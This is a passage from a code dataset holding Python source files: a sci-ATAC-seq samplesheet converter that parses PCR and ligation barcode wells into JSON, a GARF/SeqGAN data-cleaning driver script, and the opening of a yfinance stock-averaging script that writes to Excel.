-1 )\n for i in range( icol_col1, icol_col2 + 1 ):\n column_list.append(str(i))\n return(column_list)\n\n\ndef test_pcr_format(column_name_list):\n \"\"\"\n Find the P7 and P5 columns in the header column_name_list.\n Return the column indices, or None if the P7 and P5 are\n not in the row and column format.\n \"\"\"\n pcr7_column = None\n pcr5_column = None\n for icol in range(len(column_name_list)):\n column_dict = column_name_list[icol]\n if(column_dict['type'] == 'p7' and\n column_dict['format'] == 'rows'):\n pcr7_column = icol\n elif(column_dict['type'] == 'p5' and\n column_dict['format'] == 'columns'):\n pcr5_column = icol\n return(pcr7_column, pcr5_column)\n\n\ndef expand_sample_rows(column_name_list, samplesheet_row_list):\n \"\"\"\n Expand sample rows by each P7 row and P5 column listed for\n each sample. For example, if sample_A has P7 rows 'A,D'\n and P5 columns '5,3', expand_sample_rows returns a list\n that includes two rows for sample_A where the first sample\n row has A for the P7 row and 5 for the P5 column and the\n second row has D and 3 for the P7 row and P5 column,\n respectively.\n \"\"\"\n # If P7 format != p7_rows or P5 format != p5_columns, then\n # return without expanding.\n pcr7_column, pcr5_column = test_pcr_format(column_name_list)\n if(pcr7_column == None or pcr5_column == None):\n return(samplesheet_row_list)\n\n # Expand samples by pairing the i-th P7 row with the i-th P5\n # column for each of the specified rows and columns. Each sample\n # row has one PCR row and one PCR column.\n new_samplesheet_row_list = []\n num_element = len(column_name_list)\n for irow, samplesheet_row in enumerate(samplesheet_row_list):\n element_coordinates = [str( irow + 2 ), chr( pcr7_column + ord( 'A' ))]\n row_list = expand_rows(samplesheet_row[pcr7_column], element_coordinates = element_coordinates)\n element_coordinates = [str( irow + 2 ), chr( pcr5_column + ord( 'A' ))]\n column_list = expand_columns(samplesheet_row[pcr5_column], element_coordinates = element_coordinates)\n if(len(row_list) != len(column_list)):\n print('Error: number of rows is not equal to number of columns in sample sheet row %d' % (irow + 2))\n sys.exit(-1)\n num_expand = len(row_list)\n for iexpand in range(num_expand):\n element_list = []\n for ielem in range(num_element):\n if(ielem == pcr7_column):\n element_list.append(row_list[iexpand])\n elif(ielem == pcr5_column):\n element_list.append(column_list[iexpand])\n else:\n element_list.append(samplesheet_row[ielem])\n new_samplesheet_row_list.append(element_list)\n return(new_samplesheet_row_list)\n\n\ndef make_samplesheet_indexes( column_name_list, samplesheet_row_list ):\n \"\"\"\n Make well index lists for N5, N7, P5, P7 barcode wells from the input samplesheet information.\n \"\"\"\n num_col = len( column_name_list )\n row_out_list = []\n for irow, row_elements in enumerate( samplesheet_row_list ):\n if( len( row_elements ) < num_col ):\n print( 'Error: missing cells in row %d: %s' % ( irow + 1, ', '.join('\"{0}\"'.format(e) for e in row_elements ) ), file=sys.stderr )\n sys.exit( -1 )\n icol = 0\n for element_string, column_name_dict in zip( row_elements, column_name_list ):\n icol += 1\n wrap_group = None\n element_coordinates = [ str( irow + 2 ), chr( icol + ord( 'A' ) - 1 ) ]\n if( column_name_dict['type'] == 'n7' ):\n max_index = 384\n if( column_name_dict['format'] == 'indexes' ):\n n7_index_list = parse_indexes( element_string, max_index, element_coordinates )\n elif( column_name_dict['format'] == 'wells' ):\n n7_index_list = parse_wells( element_string, True, max_index, element_coordinates )\n else:\n print( 'Error: unexpected N7 format', file=sys.stderr )\n sys.exit( -1 )\n elif( column_name_dict['type'] == 'n5' ):\n max_index = 384\n if( column_name_dict['format'] == 'indexes' ):\n n5_index_list = parse_indexes( element_string, max_index, element_coordinates )\n elif( column_name_dict['format'] == 'wells' ):\n n5_index_list = parse_wells( element_string, False, max_index, element_coordinates )\n else:\n print( 'Error: unexpected N5 format', file=sys.stderr )\n sys.exit( -1 )\n elif( column_name_dict['type'] == 'p7' ):\n max_index = 96\n if( column_name_dict['format'] == 'indexes' ):\n p7_index_list = parse_indexes( element_string, max_index, element_coordinates )\n elif( column_name_dict['format'] == 'wells' ):\n p7_index_list = parse_wells( element_string, True, max_index, element_coordinates )\n elif( column_name_dict['format'] == 'rows' ):\n p7_index_list = parse_rows( element_string, element_coordinates )\n else:\n print( 'Error: unexpected P7 format', file=sys.stderr )\n sys.exit( -1 )\n elif( column_name_dict['type'] == 'p5' ):\n max_index = 96\n if( column_name_dict['format'] == 'indexes' ):\n p5_index_list = parse_indexes( element_string, max_index, element_coordinates )\n elif( column_name_dict['format'] == 'wells' ):\n p5_index_list = parse_wells( element_string, False, max_index, element_coordinates )\n elif( column_name_dict['format'] == 'columns' ):\n p5_index_list = parse_columns( element_string, element_coordinates )\n else:\n print( 'Error: unexpected P5 format', file=sys.stderr )\n sys.exit( -1 )\n elif( column_name_dict['type'] == 'sample_name' ):\n sample_name = element_string\n elif( column_name_dict['type'] == 'genome' ):\n genome = element_string\n elif( column_name_dict['type'] == 'peak_group' ):\n peak_group = element_string\n elif( column_name_dict['type'] == 'peak_file' ):\n peak_file = element_string\n elif( column_name_dict['type'] == 'wrap_group' ):\n wrap_group = element_string\n #\n row_out_list.append( { 'sample_name': sample_name,\n 'n7_index_list': n7_index_list,\n 'p7_index_list': p7_index_list,\n 'n5_index_list': n5_index_list,\n 'p5_index_list': p5_index_list,\n 'genome': genome,\n 'peak_group': peak_group,\n 'peak_file': peak_file,\n 'wrap_group': wrap_group } )\n return( row_out_list )\n\n\ndef check_sample_identifier( row_out_list, sample_identifier ):\n \"\"\"\n Check for samples that have in common sample identifier well indexes.\n Typically, sci-ATAC experiments use the N5 barcode to identify samples. Check whether\n these sample identifier barcodes occur in more than one sample.\n Notes:\n o some experiments use a combination of ligation and PCR barcodes to\n identify samples, and the same ligation barcodes can be assigned\n intentionally to more than one sample \n o issue warning and continue rather than error and exit\n \"\"\"\n key = '%s_index_list' % ( sample_identifier )\n index_dict = {}\n for row_out in row_out_list:\n for i in row_out[key]:\n index_dict.setdefault( i, 0 )\n index_dict[i] += 1\n duplicate_list = []\n for i in index_dict.keys():\n if( index_dict[i] > 1 ):\n duplicate_list.append( i )\n\n if( len( duplicate_list ) > 0 ):\n print( 'Warning: the following samples have %s wells in common' % ( sample_identifier ), file=sys.stderr )\n for row_out in row_out_list:\n if( set( duplicate_list ).intersection( set( row_out[key] ) ) ):\n print( ' %s' % ( row_out['sample_name'] ), file=sys.stderr )\n return( 0 )\n\n\ndef dump_row_out_list( row_out_list ):\n \"\"\"\n Diagnostic function to dump (barcode) well index lists.\n \"\"\"\n for row_out in row_out_list:\n print( 'sample_name: %s' % ( row_out['sample_name'] ) )\n print( ' n7_index_list: %s' % ( make_index_string( row_out['n7_index_list'] ) ) )\n print( ' p7_index_list: %s' % ( make_index_string( row_out['p7_index_list'] ) ) )\n print( ' p5_index_list: %s' % ( make_index_string( row_out['p5_index_list'] ) ) )\n print( ' n5_index_list: %s' % ( make_index_string( row_out['n5_index_list'] ) ) )\n print( ' genome: %s' % ( row_out['genome'] ) )\n return( 0 )\n\n\ndef write_samplesheet_index_format( file, row_out_list ):\n \"\"\"\n Write a well index samplesheet file in Andrew's format.\n \"\"\"\n print( 'sample_id\\tranges\\tgenome', file=file )\n for row_out in row_out_list:\n print( '%s\\t%s:%s:%s:%s\\t%s\\t%s' % ( row_out['sample_name'],\n make_index_string( row_out['n7_index_list'] ),\n make_index_string( row_out['p7_index_list'] ),\n make_index_string( row_out['p5_index_list'] ),\n make_index_string( row_out['n5_index_list'] ),\n row_out['genome'],\n row_out['peak_group'],\n row_out['peak_file'] ), file=file )\n\n return( 0 )\n\n\ndef get_pcr_row_col( column_name_list, samplesheet_row_list ):\n \"\"\"\n Given lists of PCR rows and columns by sample, return lists of\n distinct PCR rows and columns for JSON output file. This values\n are used by the demux_dash.\n \"\"\"\n p5_re_pattern = r'([1-9][0-2]?)([-:]([1-9][0-2]?))?$'\n p7_re_pattern = r'([a-hA-H])([-:]([a-hA-H]))?$'\n\n # find required samplesheet column\n p5_samplesheet_col = None\n p7_samplesheet_col = None\n for icol, column_name_dict in enumerate( column_name_list ):\n if( column_name_dict['type'] == 'p5' ):\n p5_samplesheet_col = icol\n if( column_name_dict['type'] == 'p7' ):\n p7_samplesheet_col = icol\n\n # gather plate values\n pair_samplesheet_row_list = []\n for samplesheet_row in samplesheet_row_list:\n p5_samplesheet_row_list = []\n for value_range in samplesheet_row[p5_samplesheet_col].split( ',' ):\n value_range = re.sub( r'\\s', '', value_range )\n mobj = re.match( p5_re_pattern, value_range )\n if( not mobj ):\n print( 'Error: bad value or value range \\'%s\\'' % ( value_range ), file=sys.stderr )\n sys.exit( -1 )\n col1 = int( mobj.group( 1 ) )\n col2 = col1\n if( mobj.group( 2 ) ):\n col2 = int( mobj.group( 3 ) )\n for col in range( col1, col2 + 1 ):\n p5_samplesheet_row_list.append( str( col ) )\n\n p7_samplesheet_row_list = []\n for value_range in samplesheet_row[p7_samplesheet_col].split( ',' ):\n value_range = re.sub( r'\\s', '', value_range )\n mobj = re.match( p7_re_pattern, value_range )\n if( not mobj ):\n print( 'Error: bad value or value range \\'%s\\'' % ( value_range ), file=sys.stderr )\n sys.exit( -1 )\n row1 = mobj.group( 1 )\n row2 = row1\n if( mobj.group( 2 ) ):\n row2 = mobj.group( 3 )\n for orow in range( ord( row1 ), ord( row2 ) + 1 ):\n p7_samplesheet_row_list.append( chr( orow ) )\n\n pair_samplesheet_row_list.append( [ p5_samplesheet_row_list, p7_samplesheet_row_list ] )\n\n pair_list_dict = {}\n for pair_samplesheet_row in pair_samplesheet_row_list:\n key = '_'.join( pair_samplesheet_row[0] ) + '_' + '_'.join( pair_samplesheet_row[1] )\n pair_list_dict.setdefault( key, pair_samplesheet_row )\n\n p5_col_list = []\n p7_row_list = []\n for key in pair_list_dict.keys():\n p5_col_list.extend( pair_list_dict[key][0] )\n p7_row_list.extend( pair_list_dict[key][1] )\n\n return( p5_col_list, p7_row_list )\n\n\ndef get_pcr_wells( column_name_list, samplesheet_row_list ):\n \"\"\"\n Given the samplesheet rows, return lists of specified PCR wells,\n if any.\n \"\"\"\n p5_samplesheet_col = None\n p7_samplesheet_col = None\n for icol, column_name_dict in enumerate( column_name_list ):\n if( column_name_dict['type'] == 'p5' ):\n p5_samplesheet_col = icol\n if( column_name_dict['type'] == 'p7' ):\n p7_samplesheet_col = icol\n\n pair_samplesheet_row_list = []\n for samplesheet_row in samplesheet_row_list:\n p5_samplesheet_row_list = []\n for value_range in samplesheet_row[p5_samplesheet_col].split( ',' ):\n value_range = re.sub( r'\\s', '', value_range )\n mobj = re.match( r'([pP][0]?([1-4*])[-:])?([a-hA-H])([0]?[1-9][0-2]?)([-:]([pP][0]?([1-4*])[-:])?([a-hA-H])([0]?[1-9][0-2]?))?$', value_range )\n if( not mobj ):\n print( 'Error: bad well or well range \\'%s\\'' % ( value_range ), file=sys.stderr )\n sys.exit( -1 )\n\n # Assume that the well-range strings were checked earlier in parse_wells() call so\n # those tests are omitted here. Also, this is PCR for which there is a single plate=1.\n # first well\n row1 = mobj.group( 3 )\n col1 = int( mobj.group( 4 ) )\n row2 = row1\n col2 = col1\n if( col1 < 1 or col1 > 12 ):\n print( 'Error: bad well: \\'%s\\'' % ( value_range ), file=sys.stderr )\n sys.exit( -1 )\n if( mobj.group( 5 ) ):\n # second well, if this is a range\n row2 = mobj.group( 8 )\n col2 = int( mobj.group( 9 ) )\n across_row_first = False # p5\n index1 = well_to_index( 1, row1, col1, across_row_first, [ None, None ] )\n index2 = well_to_index( 1, row2, col2, across_row_first, [ None, None ] )\n\n for well_index in range( index1, index2 + 1 ):\n well = index_to_well( well_index - 1, across_row_first )\n p5_samplesheet_row_list.append( well )\n\n p7_samplesheet_row_list = []\n for value_range in samplesheet_row[p7_samplesheet_col].split( ',' ):\n value_range = re.sub( r'\\s', '', value_range )\n mobj = re.match( r'([pP][0]?([1-4*])[-:])?([a-hA-H])([0]?[1-9][0-2]?)([-:]([pP][0]?([1-4*])[-:])?([a-hA-H])([0]?[1-9][0-2]?))?$', value_range )\n if( not mobj ):\n print( 'Error: bad well or well range \\'%s\\'' % ( value_range ), file=sys.stderr )\n sys.exit( -1 )\n\n # Assume that the well-range strings were checked earlier in parse_wells() call so\n # those tests are omitted here. Also, this is PCR for which there is a single plate=1.\n # first well\n row1 = mobj.group( 3 )\n col1 = int( mobj.group( 4 ) )\n row2 = row1\n col2 = col1\n if( col1 < 1 or col1 > 12 ):\n print( 'Error: bad well: \\'%s\\'' % ( value_range ), file=sys.stderr )\n sys.exit( -1 )\n if( mobj.group( 5 ) ):\n # second well, if this is a range\n row2 = mobj.group( 8 )\n col2 = int( mobj.group( 9 ) )\n across_row_first = True # p7\n index1 = well_to_index( 1, row1, col1, across_row_first, [ None, None ] )\n index2 = well_to_index( 1, row2, col2, across_row_first, [ None, None ] )\n\n for well_index in range( index1, index2 + 1 ):\n well = index_to_well( well_index - 1, across_row_first )\n p7_samplesheet_row_list.append( well )\n\n pair_samplesheet_row_list.append( [ p5_samplesheet_row_list, p7_samplesheet_row_list ] )\n\n pair_list_dict = {}\n for pair_samplesheet_row in pair_samplesheet_row_list:\n key = '_'.join( pair_samplesheet_row[0] ) + '_' + '_'.join( pair_samplesheet_row[1] )\n pair_list_dict.setdefault( key, pair_samplesheet_row )\n\n p5_well_list = []\n p7_well_list = []\n for key in pair_list_dict.keys():\n p5_well_list.extend( pair_list_dict[key][0] )\n p7_well_list.extend( pair_list_dict[key][1] )\n\n return( p5_well_list, p7_well_list )\n\n\ndef write_samplesheet_json_format( file, column_name_list, samplesheet_row_list, row_out_list, wrap_groups_dict, level = 3, number_wells = 384, tn5_barcodes = False, use_all_barcodes = False, illumina_run_directory = 'NA' ):\n \"\"\"\n Write an output samplesheet file in JSON format.\n \"\"\"\n # Store input samplesheet for for reference if questions arise.\n input_samplesheet_rows = []\n for samplesheet_row in samplesheet_row_list:\n input_samplesheet_rows.append( ','.join( '\"{0}\"'.format( e ) for e in samplesheet_row ) )\n\n # Store sample information for processing pipeline.\n sample_index_list = []\n for row_out in row_out_list:\n sample_index_list.append( { 'sample_id' : row_out['sample_name'],\n 'ranges' : ':'.join( [ make_index_string( row_out['n7_index_list'] ),\n make_index_string( row_out['p7_index_list'] ),\n make_index_string( row_out['p5_index_list'] ),\n make_index_string( row_out['n5_index_list'] ) ] ),\n 'genome' : row_out['genome'],\n 'peak_group' : row_out['peak_group'],\n 'peak_file' : row_out['peak_file'] })\n\n # Store information for dashboard(s).\n\n # Note: assume that the header was checked for consistent\n # p5 => columns and p7 => rows\n pcr_format = None\n for icol, column_name_dict in enumerate( column_name_list ):\n if( column_name_dict['type'] == 'p5' ):\n if( column_name_dict['format'] == 'columns' ):\n pcr_format = 'row_col'\n elif( column_name_dict['format'] == 'indexes' ):\n pcr_format = 'indexes'\n elif( column_name_dict['format'] == 'wells' ):\n pcr_format = 'wells'\n\n # PCR rows and columns specified?\n p5_col_list = None\n p7_row_list = None\n if( pcr_format == 'row_col' ):\n p5_col_list, p7_row_list = get_pcr_row_col( column_name_list, samplesheet_row_list )\n\n # PCR wells specified?\n p5_well_list = None\n p7_well_list = None\n if( pcr_format == 'wells' ):\n p5_well_list, p7_well_list = get_pcr_wells( column_name_list, samplesheet_row_list ) \n\n # JSON structure.\n sample_data = { 'json_file_version' : json_file_version,\n 'illumina_run_directory' : illumina_run_directory,\n 'level' : level,\n 'number_wells' : number_wells,\n 'tn5_barcodes' : tn5_barcodes,\n 'use_all_barcodes' : use_all_barcodes,\n 'input_samplesheet_rows' : input_samplesheet_rows,\n 'pcr_format': pcr_format,\n 'p5_col_list' : p5_col_list,\n 'p7_row_list' : p7_row_list,\n 'p5_well_list' : p5_well_list,\n 'p7_well_list' : p7_well_list,\n 'sample_index_list' : sample_index_list,\n 'wrap_groups_dict': wrap_groups_dict,\n }\n file.write(json.dumps(sample_data, indent=4))\n\n return( 0 )\n\n\n#\n# Count distinct well indexes.\n#\ndef count_wells( index_list ):\n num_well = len( set( index_list ) )\n return( num_well )\n\n\n#\n# Gather wrap group information. That is, the\n# wrap group names, if they are given in the\n# input samplesheet file, and the samples that belong\n# to them.\n#\ndef get_wrap_groups( row_out_list ):\n wrap_groups_dict = {}\n for irow, row_out in enumerate(row_out_list):\n # Gather wrap_group values in wrap_groups_dict.\n # Does this sample have a wrap group value?\n if( row_out.get( 'wrap_group' ) != None and row_out['wrap_group'] != '' ):\n if( wrap_groups_dict.get( row_out['wrap_group'] ) == None ):\n wrap_groups_dict[row_out['wrap_group']] = [ row_out['sample_name'] ]\n elif( row_out['sample_name'] not in wrap_groups_dict[row_out['wrap_group']] ):\n wrap_groups_dict[row_out['wrap_group']].append( row_out['sample_name'] )\n return( wrap_groups_dict )\n\n\n\ndef samplesheet_report( samplesheet_row_list, row_out_list, wrap_groups_dict, args ):\n print()\n print( '== Samplesheet information ==' )\n print( ' Tn5 barcodes: %r' % ( args.tn5_barcodes ) )\n print( ' Level: %s' % ( args.level ) )\n print( ' Number of wells: %d' % ( args.number_wells ) )\n print( ' Sample identifier: %s' % ( args.sample_identifier ) )\n print( ' Use all barcodes: %r' % ( args.use_all_barcodes ) )\n\n print( ' Sample names after converting unacceptable characters to \\'.\\':' )\n for irow, row_out in enumerate(row_out_list):\n if(irow > 0 and row_out_list[irow]['sample_name'] == row_out_list[irow-1]['sample_name']):\n continue\n print( ' %s' % ( row_out['sample_name'] ) )\n\n print( ' Sample well counts:' )\n max_len_samplename = 0\n for row_out in row_out_list:\n if( len( row_out['sample_name'] ) > max_len_samplename ):\n max_len_samplename = len( row_out['sample_name'] )\n if( len( 'name' ) > max_len_samplename ):\n max_len_samplename = len( 'name' )\n print( ' name%s N7 P7 P5 N5' % ( ' ' * ( max_len_samplename - len( 'name' ) ) ) )\n\n for irow, row_out in enumerate(row_out_list):\n if(irow > 0\n and row_out_list[irow]['sample_name'] == row_out_list[irow-1]['sample_name']\n and count_wells(row_out_list[irow]['n7_index_list']) == count_wells(row_out_list[irow-1]['n7_index_list'])\n and count_wells(row_out_list[irow]['p7_index_list']) == count_wells(row_out_list[irow-1]['p7_index_list'])\n and count_wells(row_out_list[irow]['p5_index_list']) == count_wells(row_out_list[irow-1]['p5_index_list'])\n and count_wells(row_out_list[irow]['n5_index_list']) == count_wells(row_out_list[irow-1]['n5_index_list'])):\n continue\n\n print( ' %s%s %d %d %d %d' % ( row_out['sample_name'],\n ' ' * ( max_len_samplename - len( row_out['sample_name'] ) ),\n count_wells( row_out['n7_index_list'] ),\n count_wells( row_out['p7_index_list'] ),\n count_wells( row_out['p5_index_list'] ),\n count_wells( row_out['n5_index_list'] ) ) )\n print( ' Sample peak groups and files:' )\n max_len_peak_group = 0\n max_len_genome = 0\n for row_out in row_out_list:\n if( len( row_out['peak_group'] ) > max_len_peak_group ):\n max_len_peak_group = len( row_out['peak_group'] )\n if( len( row_out['genome'] ) > max_len_genome ):\n max_len_genome = len( row_out['genome'] )\n if( len( 'peak_group' ) > max_len_peak_group ):\n max_len_peak_group = len( 'peak_group' )\n if( len( 'genome' ) > max_len_genome ):\n max_len_genome = len( 'genome' )\n print( ' name%s genome%s peak_group%s peak_file' % ( ' ' * ( max_len_samplename - len( 'name' ) ), ' ' * ( max_len_genome - len( 'genome' ) ), ' ' * ( max_len_peak_group - len( 'peak_group' ) ) ) )\n for irow, row_out in enumerate(row_out_list):\n if(irow > 0\n and row_out_list[irow]['sample_name'] == row_out_list[irow-1]['sample_name'] \n and row_out_list[irow]['genome'] == row_out_list[irow-1]['genome']\n and row_out_list[irow]['peak_group'] == row_out_list[irow-1]['peak_group']\n and row_out_list[irow]['peak_file'] == row_out_list[irow-1]['peak_file']):\n continue\n\n print( ' %s%s %s%s %s%s %s' % ( row_out['sample_name'],\n ' ' * ( max_len_samplename - len( row_out['sample_name'] ) ),\n row_out['genome'],\n ' ' * ( max_len_genome - len( row_out['genome'] ) ),\n row_out['peak_group'],\n ' ' * ( max_len_peak_group - len( row_out['peak_group'] ) ),\n row_out['peak_file'] ) )\n\n # Report information about wrap groups for the wrapping,\n # if it exists in the input samplesheet file.\n if( len( wrap_groups_dict.keys() ) > 0 ):\n print( ' Distribution groups:' )\n for wrap_group in wrap_groups_dict.keys():\n print( ' Group: %s' % ( wrap_group ) )\n print( ' Samples:' )\n for sample_name in wrap_groups_dict[wrap_group]:\n print( ' %s' % ( sample_name ) )\n\n print( ' Illumina run directory: %s' % ( args.run_dir ) )\n print( ' Run sciatac_samplesheet.py -d for more information.' )\n return( 0 )\n\n\ndef write_samplesheet_template():\n filename = 'samplesheet.template.csv'\n with open( filename, 'wt' ) as fp:\n print( 'n7_wells,p7_rows,p5_columns,n5_wells,sample_name,genome', file=fp )\n print( 'p1:A01-p1:H12,a-d,5-8,p1:a01-p1:h01,sample1,barnyard', file=fp )\n return( 0 )\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='A program to convert sci-ATAC CSV samplesheet to pipeline samplesheet.')\n parser.add_argument('-i', '--input', required=False, default=None, help='Input CSV samplesheet filename (required string).')\n parser.add_argument('-o', '--output', required=False, default=None, help='Output samplesheet filename (required string).')\n parser.add_argument('-f', '--format', required=False, choices=[ 'json', 'index'], default='json', help='Output file format (default: \\'%(default)s\\') (optional string).')\n parser.add_argument('-r', '--run_dir', required=False, default=None, help='Illumina run directory path (optional string).')\n parser.add_argument('-l', '--level', type=int, required=False, choices=[ 2, 3 ], default=3, help='Two or three level sci-ATAC-seq experiment (default: %(default)s) (optional integer).')\n parser.add_argument('-w', '--number_wells', type=int, required=False, choices=[ 96, 384 ], default=384, help='Number of barcode set wells (default: %(default)s) (optional integer).')\n parser.add_argument('-t', '--tn5_barcodes', required=False, action='store_true', help='Tn5 has barcodes (optional flag).')\n parser.add_argument('-s', '--sample_identifier', required=False, choices=[ 'n5', 'n7' ], default='n5', help='Ligation barcode that identifies the sample (default: \\'%(default)s\\') used to check for duplicates (optional string).')\n parser.add_argument('--use_all_barcodes', required=False, action='store_true', help='Use all barcodes to demultiplex fastq files. By default, uninformative barcodes are not used to identify samples when demultiplexing fastq files (optional flag).')\n parser.add_argument('--no_expand_pcr_rows_columns', required=False, action='store_true', help='Without --no_expand_pcr_rows_columns, this program pairs the i-th P7 row with the i-th P5 column for each sample. With --no_expand_pcr_rows_columns, all combinations of P7 rows and P5 columns are used for each sample.')\n parser.add_argument('-e', '--template', required=False, action='store_true', help='Write template samplesheet file (\\'samplesheet.template.csv\\') with standard column formats and exit (optional flag).')\n parser.add_argument('-d', '--documentation', required=False, action='store_true', help='Display documentation and exit (optional flag).')\n parser.add_argument('-v', '--version', required=False, action='store_true', help='Give program and JSON output file versions and exit (optional flag).')\n args = parser.parse_args()\n\n # Write documentation.\n if( args.documentation ):\n display_documentation()\n sys.exit( 0 )\n\n # Write versions.\n if( args.version ):\n print( 'Program version: %s' % ( program_version ) )\n print( 'JSON output file version: %s' % ( json_file_version ) )\n sys.exit( 0 )\n\n # Write samplesheet template file.\n if( args.template ):\n write_samplesheet_template()\n sys.exit( 0 )\n\n # Check for required command line parameters.\n error_string = ''\n if( args.input == None ):\n error_string += ' input filename parameter: -i or --input \\n'\n if( args.output == None ):\n error_string += ' output filename parameter: -o or --output \\n'\n if( len( error_string ) > 0 ):\n print( 'Error: missing command line parameters\\n%s' % ( error_string ) )\n print( 'For help run \\'sciatac_samplesheet.py -h\\' or \\'sciatac_samplesheet.py -d\\'' )\n sys.exit( -1 )\n\n #\n # Check command line parameter consistency.\n #\n check_args( args )\n\n # Go to work.\n filename_in = args.input\n filename_out = args.output\n\n column_name_list, samplesheet_row_list = read_samplesheet( open( filename_in, newline='' ) )\n samplesheet_row_list = check_sample_names( column_name_list, samplesheet_row_list )\n check_genome_names( column_name_list, samplesheet_row_list )\n check_peak_groups( column_name_list, samplesheet_row_list )\n check_peak_files( column_name_list, samplesheet_row_list )\n check_peak_spec( column_name_list, samplesheet_row_list )\n check_wrap_group( column_name_list, samplesheet_row_list )\n\n if(not args.no_expand_pcr_rows_columns):\n samplesheet_row_list = expand_sample_rows(column_name_list, samplesheet_row_list)\n\n row_out_list = make_samplesheet_indexes( column_name_list, samplesheet_row_list )\n check_sample_identifier( row_out_list, args.sample_identifier )\n wrap_groups_dict = get_wrap_groups( row_out_list )\n if( args.format == 'json' ):\n write_samplesheet_json_format( open( filename_out, 'w' ), column_name_list, samplesheet_row_list, row_out_list, wrap_groups_dict, level = args.level, number_wells = args.number_wells, tn5_barcodes = args.tn5_barcodes, use_all_barcodes = args.use_all_barcodes, illumina_run_directory = args.run_dir )\n else:\n write_samplesheet_index_format( open( filename_out, 'w' ), row_out_list )\n samplesheet_report( samplesheet_row_list, row_out_list, wrap_groups_dict, args )\n # diagnostic dump\n # dump_row_out_list( row_out_list )\n\n","repo_name":"bbi-lab/bbi-sciatac-demux","sub_path":"samplesheet/sciatac_samplesheet.py","file_name":"sciatac_samplesheet.py","file_ext":"py","file_size_in_byte":72274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"19286167223","text":"import os\nimport json\nimport traceback\nfrom pathlib import Path\nimport time\n\nfrom SeqGAN.train import Trainer\nfrom eva import evaluate\nfrom att_reverse import att_reverse\nfrom rule_sample import rule_sample\nimport config\n\n\n# To use the setup with Kubernetes, read the datasets name from an environment variable.\ndataset = os.environ.get('DATASET', 'DATASET_not_set')\n\n# Otherwise, you can set the dataset name manually here.\n# dataset = '184_simple_mcar_1'\n\npath = f\"{dataset}_copy\"\npath_ori = dataset\npath_dirty = f\"{dataset}_dirty\"\n\n\n# Paths\nmodels_path = Path('models/')\nmodels_base_path = models_path / dataset\npath_rules = models_base_path / \"rules.txt\"\n\nmodels_base_path.mkdir(parents=True, exist_ok=True)\ng_pre_weights_path = models_base_path / 'generator_pre.hdf5'\nd_pre_weights_path = models_base_path / 'discriminator_pre.hdf5'\ng_weights_path = models_base_path / 'generator.pkl'\nd_weights_path = models_base_path / 'discriminator.hdf5'\npath_neg = models_base_path / 'generated_sentences.txt'\n\n# Create these files\nfor file in [g_pre_weights_path, d_pre_weights_path, g_weights_path, d_weights_path, path_neg]:\n file.touch(exist_ok=True)\n\norder = config.order # Order, 1 for positive order, 0 for negative order\n\ntry:\n for order in [1, 0]: # Changed by Philipp: Run GARF in positive and negative order once each.\n att_reverse(path, order, models_base_path)\n if config.flag == 0 or config.flag == 2: # 0 for training SeqGAN, 1 for repairing part, 2 for doing it simultaneously\n trainer = Trainer(order,\n config.batch_size,\n config.max_length,\n config.g_e,\n config.g_h,\n config.d_e,\n config.d_h,\n config.d_dropout,\n config.generate_samples,\n path_pos=path,\n path_neg=str(path_neg),\n path_rules=path_rules,\n g_lr=config.g_lr,\n d_lr=config.d_lr,\n n_sample=config.n_sample,\n models_base_path=models_base_path)\n\n trainer.pre_train(g_epochs=config.g_pre_epochs,\n d_epochs=config.d_pre_epochs,\n g_pre_path=str(g_pre_weights_path),\n d_pre_path=str(d_pre_weights_path),\n g_lr=config.g_pre_lr,\n d_lr=config.d_pre_lr)\n\n trainer.load_pre_train(g_pre_weights_path, d_pre_weights_path)\n trainer.reflect_pre_train() # Mapping layer weights to agent\n\n trainer.train(steps=1,\n g_steps=1,\n head=10,\n g_weights_path=g_weights_path,\n d_weights_path=d_weights_path)\n\n trainer.save(g_weights_path, d_weights_path)\n\n if config.flag == 1 or config.flag == 2:\n trainer = Trainer(order,\n 1,\n config.max_length,\n config.g_e,\n config.g_h,\n config.d_e,\n config.d_h,\n config.d_dropout,\n config.generate_samples,\n path_pos=path,\n path_neg=str(path_neg),\n g_lr=config.g_lr,\n d_lr=config.d_lr,\n n_sample=config.n_sample,\n path_rules=path_rules,\n models_base_path=models_base_path)\n trainer.load(g_weights_path, d_weights_path)\n\n rule_len = rule_sample(path_rules, path, order)\n trainer.train_rules(rule_len, path_rules) # For production rules, generate rules_final.txt from rules.txt\n trainer.filter(path)\n\n att_reverse(path, 1, models_base_path)\n trainer.repair(path)\n evaluate(path_ori, path, path_dirty)\n\nexcept Exception as e:\n exception_type = str(type(e).__name__)\n exception_message = str(e)\n exception_traceback = traceback.format_exc()\n\n # Create a dictionary to store the exception information\n exception_data = {\n \"dataset\": path_ori,\n \"exception_type\": exception_type,\n \"exception_message\": exception_message,\n \"exception_traceback\": exception_traceback\n }\n\n # Convert the dictionary to a JSON string\n json_data = json.dumps(exception_data, indent=4)\n\n # Write the JSON string to a text file\n timestamp = str(time.time_ns())\n with open(f'output/{path_ori}_{timestamp}.txt', 'wt') as file:\n file.write(json_data)\n print('Did not clean data successfully:')\n print(f'{exception_type}: {exception_message}')\n\n\n","repo_name":"philipp-jung/mirmir","sub_path":"benchmarks/garf/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"88"} +{"seq_id":"32230175599","text":"import yfinance as yf\nimport average_Stock_excel\nimport datetime\nimport average_Stock_excel\nfrom openpyxl import load_workbook\nimport getpass\nimport datetime\n\ndef findAndWrite():\n stock_list = average_Stock_excel.read_stock()\n code_list = average_Stock_excel.read_code()\n\n # 현재 컴퓨터의 유저명 들고오기\n userName = getpass.getuser()\n\n # oneDrive 주소 가져오기\n path1 = \"C:/Users/\"\n path2 = \"/OneDrive/AI_List.xlsx\"\n\n path = path1 + str(userName) + path2\n load_wb = load_workbook(path, data_only=True)\n load_sheet = load_wb['평균선']\n\n # 날짜 가져오기\n today = datetime.datetime.now()\n start_day = today - datetime.timedelta(days=+1)\n\n # 날짜 양식 변환(이 부분은 krx 파이썬이랑 다름)\n today = today.strftime(\"%Y-%m-%d\")\n start_day = start_day.strftime(\"%Y-%m-%d\")\n # 프로그램 실시 날짜 기록\n load_sheet.cell(3, 2).value = str(today)\n\n # 엑셀 기록을 11번 row 부터 시작함\n i = 11\n\n for code in code_list:\n print(code)\n data = yf.Ticker(code)\n # 해당 